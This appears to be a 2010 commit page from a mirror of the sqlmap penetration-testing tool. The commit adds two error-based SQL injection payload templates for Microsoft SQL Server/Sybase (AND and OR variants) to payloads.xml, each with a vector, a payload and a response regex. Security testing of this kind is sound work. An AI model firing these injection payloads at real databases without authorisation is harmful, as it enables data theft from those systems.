sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 01:47:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

new error vector for MS SQL (from David Guimaraes' mail)

Browse Source
This commit is contained in:
Miroslav Stampar 2010-12-17 19:00:20 +00:00
parent 323af45ce4
commit bfdc4fa000
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
xml/payloads.xml
View File

@ -792,6 +792,25 @@ Formats:
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase AND error-based - WHERE clause (IN)</title>
<stype>2</stype>
<level>2</level>
<risk>0</risk>
<clause>1</clause>
<where>1</where>
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
<payload>AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle AND error-based - WHERE clause (XMLType)</title>
<stype>2</stype>
@ -947,6 +966,25 @@ Formats:
</details>
</test>
<test>
<title>Microsoft SQL Server/Sybase OR error-based - WHERE clause (IN)</title>
<stype>2</stype>
<level>3</level>
<risk>2</risk>
<clause>1</clause>
<where>2</where>
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
<request>
<payload>OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))</payload>
</request>
<response>
<grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>Microsoft SQL Server</dbms>
</details>
</test>
<test>
<title>Oracle OR error-based - WHERE clause (XMLType)</title>
<stype>2</stype>